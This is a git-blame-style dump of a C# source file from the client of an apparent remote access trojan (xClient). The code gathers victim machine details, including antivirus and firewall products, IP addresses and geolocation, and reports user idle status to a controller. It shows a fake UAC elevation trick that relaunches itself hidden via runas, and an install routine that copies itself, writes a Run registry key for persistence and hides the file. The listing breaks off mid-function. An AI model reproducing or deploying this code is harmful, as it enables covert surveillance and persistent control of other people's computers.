2015-01-13 10:29:11 -08:00
|
|
|
|
using System;
|
2014-07-08 05:58:53 -07:00
|
|
|
|
using System.Diagnostics;
|
|
|
|
|
|
using System.IO;
|
|
|
|
|
|
using System.Management;
|
2015-02-24 12:58:20 -08:00
|
|
|
|
using System.Net.NetworkInformation;
|
2014-07-08 05:58:53 -07:00
|
|
|
|
using System.Net.Sockets;
|
|
|
|
|
|
using System.Runtime.InteropServices;
|
|
|
|
|
|
using System.Security.Principal;
|
|
|
|
|
|
using System.Threading;
|
|
|
|
|
|
using System.Windows.Forms;
|
2015-01-13 10:29:11 -08:00
|
|
|
|
using Microsoft.Win32;
|
|
|
|
|
|
using xClient.Config;
|
2015-02-24 10:21:01 -08:00
|
|
|
|
using xClient.Core.Information;
|
2015-03-20 06:45:58 -07:00
|
|
|
|
using xClient.Core.Encryption;
|
2015-06-02 11:15:36 -07:00
|
|
|
|
using xClient.Core.Extensions;
|
2015-07-25 15:10:59 -07:00
|
|
|
|
using xClient.Core.Helper;
|
2015-06-05 14:07:37 -07:00
|
|
|
|
using xClient.Core.Networking;
|
2015-07-25 15:10:59 -07:00
|
|
|
|
using xClient.Enums;
|
|
|
|
|
|
using xServer.Core.Helper;
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
2015-01-13 10:29:11 -08:00
|
|
|
|
namespace xClient.Core
|
2014-07-08 05:58:53 -07:00
|
|
|
|
{
|
2015-01-13 10:43:55 -08:00
|
|
|
|
public static class SystemCore
|
2014-07-08 05:58:53 -07:00
|
|
|
|
{
|
2015-05-26 06:55:52 -07:00
|
|
|
|
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
|
|
|
|
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
|
|
|
|
private static extern bool DeleteFile(string name);
|
|
|
|
|
|
|
2014-07-08 05:58:53 -07:00
|
|
|
|
[DllImport("user32.dll")]
|
2015-04-21 11:27:52 -07:00
|
|
|
|
private static extern bool GetLastInputInfo(ref LASTINPUTINFO plii);
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
|
|
|
|
|
[StructLayout(LayoutKind.Sequential)]
|
2015-04-21 11:27:52 -07:00
|
|
|
|
private struct LASTINPUTINFO
|
2014-07-08 05:58:53 -07:00
|
|
|
|
{
|
2015-04-21 11:27:52 -07:00
|
|
|
|
public static readonly int SizeOf = Marshal.SizeOf(typeof (LASTINPUTINFO));
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
2015-04-21 11:27:52 -07:00
|
|
|
|
[MarshalAs(UnmanagedType.U4)] public UInt32 cbSize;
|
|
|
|
|
|
[MarshalAs(UnmanagedType.U4)] public UInt32 dwTime;
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
|
2015-04-21 11:27:52 -07:00
|
|
|
|
public static readonly string[] ImageList =
|
|
|
|
|
|
{
|
|
|
|
|
|
"ad.png", "ae.png", "af.png", "ag.png", "ai.png", "al.png",
|
|
|
|
|
|
"am.png", "an.png", "ao.png", "ar.png", "as.png", "at.png", "au.png", "aw.png", "ax.png", "az.png", "ba.png",
|
|
|
|
|
|
"bb.png", "bd.png", "be.png", "bf.png", "bg.png", "bh.png", "bi.png", "bj.png", "bm.png", "bn.png", "bo.png",
|
|
|
|
|
|
"br.png", "bs.png", "bt.png", "bv.png", "bw.png", "by.png", "bz.png", "ca.png", "catalonia.png", "cc.png",
|
|
|
|
|
|
"cd.png", "cf.png", "cg.png", "ch.png", "ci.png", "ck.png", "cl.png", "cm.png", "cn.png", "co.png", "cr.png",
|
|
|
|
|
|
"cs.png", "cu.png", "cv.png", "cx.png", "cy.png", "cz.png", "de.png", "dj.png", "dk.png", "dm.png", "do.png",
|
|
|
|
|
|
"dz.png", "ec.png", "ee.png", "eg.png", "eh.png", "england.png", "er.png", "es.png", "et.png",
|
|
|
|
|
|
"europeanunion.png", "fam.png", "fi.png", "fj.png", "fk.png", "fm.png", "fo.png", "fr.png", "ga.png",
|
|
|
|
|
|
"gb.png", "gd.png", "ge.png", "gf.png", "gh.png", "gi.png", "gl.png", "gm.png", "gn.png", "gp.png", "gq.png",
|
|
|
|
|
|
"gr.png", "gs.png", "gt.png", "gu.png", "gw.png", "gy.png", "hk.png", "hm.png", "hn.png", "hr.png", "ht.png",
|
|
|
|
|
|
"hu.png", "id.png", "ie.png", "il.png", "in.png", "io.png", "iq.png", "ir.png", "is.png", "it.png", "jm.png",
|
|
|
|
|
|
"jo.png", "jp.png", "ke.png", "kg.png", "kh.png", "ki.png", "km.png", "kn.png", "kp.png", "kr.png", "kw.png",
|
|
|
|
|
|
"ky.png", "kz.png", "la.png", "lb.png", "lc.png", "li.png", "lk.png", "lr.png", "ls.png", "lt.png", "lu.png",
|
|
|
|
|
|
"lv.png", "ly.png", "ma.png", "mc.png", "md.png", "me.png", "mg.png", "mh.png", "mk.png", "ml.png", "mm.png",
|
|
|
|
|
|
"mn.png", "mo.png", "mp.png", "mq.png", "mr.png", "ms.png", "mt.png", "mu.png", "mv.png", "mw.png", "mx.png",
|
|
|
|
|
|
"my.png", "mz.png", "na.png", "nc.png", "ne.png", "nf.png", "ng.png", "ni.png", "nl.png", "no.png", "np.png",
|
|
|
|
|
|
"nr.png", "nu.png", "nz.png", "om.png", "pa.png", "pe.png", "pf.png", "pg.png", "ph.png", "pk.png", "pl.png",
|
|
|
|
|
|
"pm.png", "pn.png", "pr.png", "ps.png", "pt.png", "pw.png", "py.png", "qa.png", "re.png", "ro.png", "rs.png",
|
|
|
|
|
|
"ru.png", "rw.png", "sa.png", "sb.png", "sc.png", "scotland.png", "sd.png", "se.png", "sg.png", "sh.png",
|
|
|
|
|
|
"si.png", "sj.png", "sk.png", "sl.png", "sm.png", "sn.png", "so.png", "sr.png", "st.png", "sv.png", "sy.png",
|
|
|
|
|
|
"sz.png", "tc.png", "td.png", "tf.png", "tg.png", "th.png", "tj.png", "tk.png", "tl.png", "tm.png", "tn.png",
|
|
|
|
|
|
"to.png", "tr.png", "tt.png", "tv.png", "tw.png", "tz.png", "ua.png", "ug.png", "um.png", "us.png", "uy.png",
|
|
|
|
|
|
"uz.png", "va.png", "vc.png", "ve.png", "vg.png", "vi.png", "vn.png", "vu.png", "wales.png", "wf.png",
|
|
|
|
|
|
"ws.png", "ye.png", "yt.png", "za.png", "zm.png", "zw.png"
|
|
|
|
|
|
};
|
|
|
|
|
|
|
2015-07-14 14:18:48 -07:00
|
|
|
|
public static UserStatus LastStatus { get; set; }
|
|
|
|
|
|
public static bool Disconnect { get; set; } // when Disconnect is true, stop all running threads
|
|
|
|
|
|
public static string OperatingSystem { get; set; }
|
|
|
|
|
|
public static string MyPath { get; set; }
|
|
|
|
|
|
public static string InstallPath { get; set; }
|
|
|
|
|
|
public static string AccountType { get; set; }
|
|
|
|
|
|
public static string WanIp { get; set; }
|
|
|
|
|
|
public static string Country { get; set; }
|
|
|
|
|
|
public static string CountryCode { get; set; }
|
|
|
|
|
|
public static string Region { get; set; }
|
|
|
|
|
|
public static string City { get; set; }
|
|
|
|
|
|
public static int ImageIndex { get; set; }
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
|
|
|
|
|
public static string GetOperatingSystem()
|
|
|
|
|
|
{
|
2015-04-01 06:39:32 -07:00
|
|
|
|
return string.Format("{0} {1} Bit", OSInfo.Name, OSInfo.Bits);
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public static string GetAccountType()
|
|
|
|
|
|
{
|
2015-03-16 10:12:19 -07:00
|
|
|
|
using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
|
2015-02-24 10:21:01 -08:00
|
|
|
|
{
|
2015-03-16 10:12:19 -07:00
|
|
|
|
if (identity != null)
|
|
|
|
|
|
{
|
|
|
|
|
|
WindowsPrincipal principal = new WindowsPrincipal(identity);
|
|
|
|
|
|
|
|
|
|
|
|
if (principal.IsInRole(WindowsBuiltInRole.Administrator))
|
|
|
|
|
|
return "Admin";
|
|
|
|
|
|
if (principal.IsInRole(WindowsBuiltInRole.User))
|
|
|
|
|
|
return "User";
|
|
|
|
|
|
if (principal.IsInRole(WindowsBuiltInRole.Guest))
|
|
|
|
|
|
return "Guest";
|
|
|
|
|
|
}
|
2015-02-24 10:21:01 -08:00
|
|
|
|
}
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
2015-02-24 10:21:01 -08:00
|
|
|
|
return "Unknown";
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
|
2015-03-20 06:45:58 -07:00
|
|
|
|
public static string GetId()
|
|
|
|
|
|
{
|
|
|
|
|
|
return SHA256.ComputeHash(GetMacAddress());
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2014-07-08 05:58:53 -07:00
|
|
|
|
public static string GetCpu()
|
|
|
|
|
|
{
|
|
|
|
|
|
try
|
|
|
|
|
|
{
|
2015-03-17 02:28:46 -07:00
|
|
|
|
string cpuName = string.Empty;
|
2015-02-24 10:21:01 -08:00
|
|
|
|
string query = "SELECT * FROM Win32_Processor";
|
2015-03-16 10:12:19 -07:00
|
|
|
|
|
|
|
|
|
|
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher("root\\CIMV2", query))
|
|
|
|
|
|
{
|
|
|
|
|
|
foreach (ManagementObject mObject in searcher.Get())
|
|
|
|
|
|
{
|
|
|
|
|
|
cpuName = mObject["Name"].ToString();
|
|
|
|
|
|
|
|
|
|
|
|
// If a cpu name was found, return the name. Otherwise, we would continue iterating.
|
|
|
|
|
|
if (!string.IsNullOrEmpty(cpuName))
|
|
|
|
|
|
{
|
|
|
|
|
|
return cpuName;
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
catch
|
2015-04-21 11:27:52 -07:00
|
|
|
|
{
|
|
|
|
|
|
}
|
2015-03-16 10:12:19 -07:00
|
|
|
|
|
|
|
|
|
|
return "Unknown";
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public static int GetRam()
|
|
|
|
|
|
{
|
|
|
|
|
|
try
|
|
|
|
|
|
{
|
|
|
|
|
|
int installedRAM = 0;
|
2015-02-24 10:21:01 -08:00
|
|
|
|
string query = "Select * From Win32_ComputerSystem";
|
2015-03-16 10:12:19 -07:00
|
|
|
|
|
|
|
|
|
|
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(query))
|
2014-07-08 05:58:53 -07:00
|
|
|
|
{
|
2015-03-16 10:12:19 -07:00
|
|
|
|
foreach (ManagementObject mObject in searcher.Get())
|
|
|
|
|
|
{
|
|
|
|
|
|
double bytes = (Convert.ToDouble(mObject["TotalPhysicalMemory"]));
|
2015-04-21 11:27:52 -07:00
|
|
|
|
installedRAM = (int) (bytes/1048576);
|
2015-03-16 10:12:19 -07:00
|
|
|
|
}
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
return installedRAM;
|
|
|
|
|
|
}
|
|
|
|
|
|
catch
|
|
|
|
|
|
{
|
2014-07-24 14:26:59 -07:00
|
|
|
|
return -1;
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public static string GetGpu()
|
|
|
|
|
|
{
|
|
|
|
|
|
try
|
|
|
|
|
|
{
|
2015-02-24 10:21:01 -08:00
|
|
|
|
string gpuName = string.Empty;
|
|
|
|
|
|
string query = "SELECT * FROM Win32_DisplayConfiguration";
|
2015-03-16 10:12:19 -07:00
|
|
|
|
|
|
|
|
|
|
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(query))
|
|
|
|
|
|
{
|
|
|
|
|
|
foreach (ManagementObject mObject in searcher.Get())
|
|
|
|
|
|
{
|
|
|
|
|
|
gpuName = mObject["Description"].ToString();
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
2015-02-24 10:21:01 -08:00
|
|
|
|
return (!string.IsNullOrEmpty(gpuName)) ? gpuName : "N/A";
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
catch
|
|
|
|
|
|
{
|
|
|
|
|
|
return "Unknown";
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2014-07-18 09:23:04 -07:00
|
|
|
|
public static string GetAntivirus()
|
|
|
|
|
|
{
|
|
|
|
|
|
try
|
|
|
|
|
|
{
|
2015-02-24 10:21:01 -08:00
|
|
|
|
string antivirusName = string.Empty;
|
2015-07-25 15:10:59 -07:00
|
|
|
|
string scope = (PlatformHelper.XpOrHigher) ? "root\\SecurityCenter" : "root\\SecurityCenter2";
|
2015-02-24 10:21:01 -08:00
|
|
|
|
string query = "SELECT * FROM AntivirusProduct";
|
2015-03-16 10:12:19 -07:00
|
|
|
|
|
|
|
|
|
|
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query))
|
|
|
|
|
|
{
|
|
|
|
|
|
foreach (ManagementObject mObject in searcher.Get())
|
|
|
|
|
|
{
|
|
|
|
|
|
antivirusName = mObject["displayName"].ToString();
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
2015-02-24 10:21:01 -08:00
|
|
|
|
|
|
|
|
|
|
return (!string.IsNullOrEmpty(antivirusName)) ? antivirusName : "N/A";
|
2014-07-18 09:23:04 -07:00
|
|
|
|
}
|
|
|
|
|
|
catch
|
|
|
|
|
|
{
|
|
|
|
|
|
return "Unknown";
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public static string GetFirewall()
|
|
|
|
|
|
{
|
|
|
|
|
|
try
|
|
|
|
|
|
{
|
2015-02-24 10:21:01 -08:00
|
|
|
|
string firewallName = string.Empty;
|
2015-07-25 15:10:59 -07:00
|
|
|
|
string scope = (PlatformHelper.XpOrHigher) ? "root\\SecurityCenter" : "root\\SecurityCenter2";
|
2015-02-24 10:21:01 -08:00
|
|
|
|
string query = "SELECT * FROM FirewallProduct";
|
2015-03-16 10:12:19 -07:00
|
|
|
|
|
|
|
|
|
|
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query))
|
|
|
|
|
|
{
|
|
|
|
|
|
foreach (ManagementObject mObject in searcher.Get())
|
|
|
|
|
|
{
|
|
|
|
|
|
firewallName = mObject["displayName"].ToString();
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
2015-02-24 10:21:01 -08:00
|
|
|
|
|
|
|
|
|
|
return (!string.IsNullOrEmpty(firewallName)) ? firewallName : "N/A";
|
2014-07-18 09:23:04 -07:00
|
|
|
|
}
|
|
|
|
|
|
catch
|
|
|
|
|
|
{
|
|
|
|
|
|
return "Unknown";
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2015-02-24 10:21:01 -08:00
|
|
|
|
public static string GetUptime()
|
|
|
|
|
|
{
|
2015-04-21 11:27:52 -07:00
|
|
|
|
int uptimeSec = Environment.TickCount/1000;
|
2015-02-24 10:21:01 -08:00
|
|
|
|
TimeSpan result = TimeSpan.FromSeconds(uptimeSec);
|
|
|
|
|
|
return string.Format("{0}d : {1}h : {2}m : {3}s", result.Days, result.Hours, result.Minutes, result.Seconds);
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public static string GetUsername()
|
|
|
|
|
|
{
|
|
|
|
|
|
return Environment.UserName;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public static string GetPcName()
|
|
|
|
|
|
{
|
|
|
|
|
|
return Environment.MachineName;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public static string GetLanIp()
|
|
|
|
|
|
{
|
2015-02-24 12:58:20 -08:00
|
|
|
|
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
|
|
|
|
|
|
{
|
2015-04-21 11:27:52 -07:00
|
|
|
|
if (ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 ||
|
|
|
|
|
|
ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet &&
|
|
|
|
|
|
ni.OperationalStatus == OperationalStatus.Up)
|
2015-02-24 12:58:20 -08:00
|
|
|
|
{
|
|
|
|
|
|
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
|
|
|
|
|
|
{
|
|
|
|
|
|
if (ip.Address.AddressFamily != AddressFamily.InterNetwork ||
|
|
|
|
|
|
ip.AddressPreferredLifetime == UInt32.MaxValue) // exclude virtual network addresses
|
|
|
|
|
|
continue;
|
|
|
|
|
|
|
|
|
|
|
|
return ip.Address.ToString();
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
2015-02-24 10:21:01 -08:00
|
|
|
|
|
2015-02-24 12:58:20 -08:00
|
|
|
|
return "-";
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public static string GetMacAddress()
|
|
|
|
|
|
{
|
|
|
|
|
|
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
|
2015-02-24 10:21:01 -08:00
|
|
|
|
{
|
2015-04-21 11:27:52 -07:00
|
|
|
|
if (ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 ||
|
|
|
|
|
|
ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet &&
|
|
|
|
|
|
ni.OperationalStatus == OperationalStatus.Up)
|
2015-02-24 10:21:01 -08:00
|
|
|
|
{
|
2015-02-24 12:58:20 -08:00
|
|
|
|
bool foundCorrect = false;
|
|
|
|
|
|
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
|
|
|
|
|
|
{
|
|
|
|
|
|
if (ip.Address.AddressFamily != AddressFamily.InterNetwork ||
|
|
|
|
|
|
ip.AddressPreferredLifetime == UInt32.MaxValue) // exclude virtual network addresses
|
|
|
|
|
|
continue;
|
|
|
|
|
|
|
|
|
|
|
|
foundCorrect = (ip.Address.ToString() == GetLanIp());
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
if (foundCorrect)
|
2015-07-25 15:10:59 -07:00
|
|
|
|
return FormatHelper.FormatMacAddress(ni.GetPhysicalAddress().ToString());
|
2015-02-24 10:21:01 -08:00
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2015-02-24 12:58:20 -08:00
|
|
|
|
return "-";
|
2015-02-24 10:21:01 -08:00
|
|
|
|
}
|
|
|
|
|
|
|
2014-07-08 05:58:53 -07:00
|
|
|
|
public static void InitializeGeoIp()
|
|
|
|
|
|
{
|
2015-03-20 06:45:58 -07:00
|
|
|
|
GeoIP gIp = new GeoIP();
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
2015-03-20 06:45:58 -07:00
|
|
|
|
Country = gIp.Country;
|
|
|
|
|
|
CountryCode = gIp.CountryCode;
|
|
|
|
|
|
Region = gIp.Region;
|
|
|
|
|
|
City = gIp.City;
|
|
|
|
|
|
WanIp = gIp.WanIp;
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
|
|
|
|
|
if (CountryCode == "-" || Country == "Unknown")
|
|
|
|
|
|
{
|
|
|
|
|
|
ImageIndex = 247; // question icon
|
|
|
|
|
|
return;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
for (int i = 0; i < ImageList.Length; i++)
|
|
|
|
|
|
{
|
|
|
|
|
|
if (ImageList[i].Contains(CountryCode.ToLower()))
|
|
|
|
|
|
{
|
|
|
|
|
|
ImageIndex = i;
|
|
|
|
|
|
break;
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public static bool TryUacTrick()
|
|
|
|
|
|
{
|
|
|
|
|
|
if (AccountType == "Admin")
|
|
|
|
|
|
return false;
|
|
|
|
|
|
|
|
|
|
|
|
if (MyPath == InstallPath)
|
|
|
|
|
|
return false;
|
|
|
|
|
|
|
|
|
|
|
|
Thread.Sleep(3000);
|
|
|
|
|
|
|
2015-01-27 14:49:26 -08:00
|
|
|
|
Application.Run(new Elevation.FrmElevation());
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
|
|
|
|
|
Thread.Sleep(200);
|
|
|
|
|
|
|
|
|
|
|
|
Application.Exit();
|
|
|
|
|
|
|
2015-03-12 02:44:53 -07:00
|
|
|
|
ProcessStartInfo processStartInfo = new ProcessStartInfo
|
|
|
|
|
|
{
|
|
|
|
|
|
FileName = "cmd.exe",
|
|
|
|
|
|
Verb = "runas",
|
|
|
|
|
|
Arguments = "/k START \"\" \"" + MyPath + "\" -CHECK & PING -n 2 127.0.0.1 & EXIT",
|
|
|
|
|
|
WindowStyle = ProcessWindowStyle.Hidden,
|
|
|
|
|
|
UseShellExecute = true
|
|
|
|
|
|
};
|
2014-07-08 05:58:53 -07:00
|
|
|
|
try
|
|
|
|
|
|
{
|
|
|
|
|
|
Process.Start(processStartInfo);
|
|
|
|
|
|
return true;
|
|
|
|
|
|
}
|
|
|
|
|
|
catch
|
|
|
|
|
|
{
|
|
|
|
|
|
return false;
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public static bool CreateMutex(ref Mutex mutex)
|
|
|
|
|
|
{
|
2015-03-12 02:44:53 -07:00
|
|
|
|
bool createdNew;
|
2015-02-24 10:21:01 -08:00
|
|
|
|
mutex = new Mutex(false, Settings.MUTEX, out createdNew);
|
2014-07-08 05:58:53 -07:00
|
|
|
|
return createdNew;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public static void UserIdleThread()
|
|
|
|
|
|
{
|
|
|
|
|
|
while (!Disconnect)
|
|
|
|
|
|
{
|
|
|
|
|
|
Thread.Sleep(5000);
|
|
|
|
|
|
if (IsUserIdle())
|
|
|
|
|
|
{
|
2015-07-14 14:18:48 -07:00
|
|
|
|
if (LastStatus != UserStatus.Idle)
|
2014-07-08 05:58:53 -07:00
|
|
|
|
{
|
2015-07-14 14:18:48 -07:00
|
|
|
|
LastStatus = UserStatus.Idle;
|
2015-07-14 10:00:31 -07:00
|
|
|
|
new Packets.ClientPackets.SetUserStatus(LastStatus).Execute(Program.ConnectClient);
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
else
|
|
|
|
|
|
{
|
2015-07-14 14:18:48 -07:00
|
|
|
|
if (LastStatus != UserStatus.Active)
|
2014-07-08 05:58:53 -07:00
|
|
|
|
{
|
2015-07-14 14:18:48 -07:00
|
|
|
|
LastStatus = UserStatus.Active;
|
2015-07-14 10:00:31 -07:00
|
|
|
|
new Packets.ClientPackets.SetUserStatus(LastStatus).Execute(Program.ConnectClient);
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
private static bool IsUserIdle()
|
|
|
|
|
|
{
|
|
|
|
|
|
uint idleTime = 0;
|
|
|
|
|
|
LASTINPUTINFO lastInputInfo = new LASTINPUTINFO();
|
2015-04-21 11:27:52 -07:00
|
|
|
|
lastInputInfo.cbSize = (uint) Marshal.SizeOf(lastInputInfo);
|
2014-07-08 05:58:53 -07:00
|
|
|
|
lastInputInfo.dwTime = 0;
|
|
|
|
|
|
|
2015-04-21 11:27:52 -07:00
|
|
|
|
uint envTicks = (uint) Environment.TickCount;
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
|
|
|
|
|
if (GetLastInputInfo(ref lastInputInfo))
|
|
|
|
|
|
{
|
|
|
|
|
|
uint lastInputTick = lastInputInfo.dwTime;
|
|
|
|
|
|
idleTime = envTicks - lastInputTick;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2015-04-21 11:27:52 -07:00
|
|
|
|
idleTime = ((idleTime > 0) ? (idleTime/1000) : 0);
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
2015-02-24 10:21:01 -08:00
|
|
|
|
return (idleTime > 600); // idle for 10 minutes
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
|
2015-05-26 09:28:15 -07:00
|
|
|
|
public static void AddToStartup()
|
2014-07-08 05:58:53 -07:00
|
|
|
|
{
|
|
|
|
|
|
if (Settings.STARTUP)
|
|
|
|
|
|
{
|
|
|
|
|
|
if (AccountType == "Admin")
|
|
|
|
|
|
{
|
2015-03-12 02:44:53 -07:00
|
|
|
|
try // try LocalMachine
|
2014-07-08 05:58:53 -07:00
|
|
|
|
{
|
2015-04-21 11:27:52 -07:00
|
|
|
|
using (
|
|
|
|
|
|
RegistryKey key =
|
2015-06-02 11:38:44 -07:00
|
|
|
|
Registry.LocalMachine.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
|
2015-03-16 10:12:19 -07:00
|
|
|
|
{
|
|
|
|
|
|
if (key == null) throw new Exception();
|
|
|
|
|
|
key.SetValue(Settings.STARTUPKEY, InstallPath);
|
|
|
|
|
|
key.Close();
|
|
|
|
|
|
}
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
2015-03-12 02:44:53 -07:00
|
|
|
|
catch // if fails use CurrentUser
|
2014-07-08 05:58:53 -07:00
|
|
|
|
{
|
2015-03-12 02:44:53 -07:00
|
|
|
|
try
|
2014-07-08 05:58:53 -07:00
|
|
|
|
{
|
2015-04-21 11:27:52 -07:00
|
|
|
|
using (
|
|
|
|
|
|
RegistryKey key =
|
2015-06-02 11:38:44 -07:00
|
|
|
|
Registry.CurrentUser.OpenWritableSubKeySafe(
|
2015-06-02 11:15:36 -07:00
|
|
|
|
"Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
|
2015-03-16 10:12:19 -07:00
|
|
|
|
{
|
|
|
|
|
|
if (key == null) throw new Exception();
|
|
|
|
|
|
key.SetValue(Settings.STARTUPKEY, InstallPath);
|
|
|
|
|
|
key.Close();
|
|
|
|
|
|
}
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
catch
|
2015-04-21 11:27:52 -07:00
|
|
|
|
{
|
|
|
|
|
|
}
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
else
|
|
|
|
|
|
{
|
|
|
|
|
|
try
|
|
|
|
|
|
{
|
2015-04-21 11:27:52 -07:00
|
|
|
|
using (
|
|
|
|
|
|
RegistryKey key =
|
2015-06-02 11:38:44 -07:00
|
|
|
|
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
|
2015-03-16 10:12:19 -07:00
|
|
|
|
{
|
|
|
|
|
|
if (key == null) throw new Exception();
|
|
|
|
|
|
key.SetValue(Settings.STARTUPKEY, InstallPath);
|
|
|
|
|
|
key.Close();
|
|
|
|
|
|
}
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
catch
|
2015-04-21 11:27:52 -07:00
|
|
|
|
{
|
|
|
|
|
|
}
|
2014-07-08 05:58:53 -07:00
|
|
|
|
}
|
|
|
|
|
|
}
|
2015-05-26 09:28:15 -07:00
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
public static void Install(bool addToStartup = true)
|
|
|
|
|
|
{
|
|
|
|
|
|
bool isKilled = false;
|
|
|
|
|
|
|
|
|
|
|
|
// create target dir
|
|
|
|
|
|
if (!Directory.Exists(Path.Combine(Settings.DIR, Settings.SUBFOLDER)))
|
|
|
|
|
|
Directory.CreateDirectory(Path.Combine(Settings.DIR, Settings.SUBFOLDER));
|
|
|
|
|
|
|
|
|
|
|
|
// delete existing file
|
|
|
|
|
|
if (File.Exists(InstallPath))
|
|
|
|
|
|
{
|
|
|
|
|
|
try
|
|
|
|
|
|
{
|
|
|
|
|
|
File.Delete(InstallPath);
|
|
|
|
|
|
}
|
|
|
|
|
|
catch (Exception ex)
|
|
|
|
|
|
{
|
|
|
|
|
|
if (ex is IOException || ex is UnauthorizedAccessException)
|
|
|
|
|
|
{
|
|
|
|
|
|
// kill old process if new mutex
|
|
|
|
|
|
Process[] foundProcesses =
|
|
|
|
|
|
Process.GetProcessesByName(Path.GetFileNameWithoutExtension(InstallPath));
|
|
|
|
|
|
int myPid = Process.GetCurrentProcess().Id;
|
|
|
|
|
|
foreach (var prc in foundProcesses)
|
|
|
|
|
|
{
|
|
|
|
|
|
if (prc.Id == myPid) continue;
|
|
|
|
|
|
prc.Kill();
|
|
|
|
|
|
isKilled = true;
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
if (isKilled) Thread.Sleep(5000);
|
|
|
|
|
|
|
|
|
|
|
|
//copy client to target dir
|
|
|
|
|
|
File.Copy(MyPath, InstallPath, true);
|
|
|
|
|
|
|
|
|
|
|
|
if (addToStartup)
|
|
|
|
|
|
AddToStartup();
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
|
|
|
|
|
if (Settings.HIDEFILE)
|
2015-03-12 02:44:53 -07:00
|
|
|
|
{
|
|
|
|
|
|
try
|
|
|
|
|
|
{
|
|
|
|
|
|
File.SetAttributes(InstallPath, FileAttributes.Hidden);
|
|
|
|
|
|
}
|
|
|
|
|
|
catch
|
2015-04-21 11:27:52 -07:00
|
|
|
|
{
|
|
|
|
|
|
}
|
2015-03-12 02:44:53 -07:00
|
|
|
|
}
|
2014-07-08 05:58:53 -07:00
|
|
|
|
|
|
|
|
|
|
//start file
|
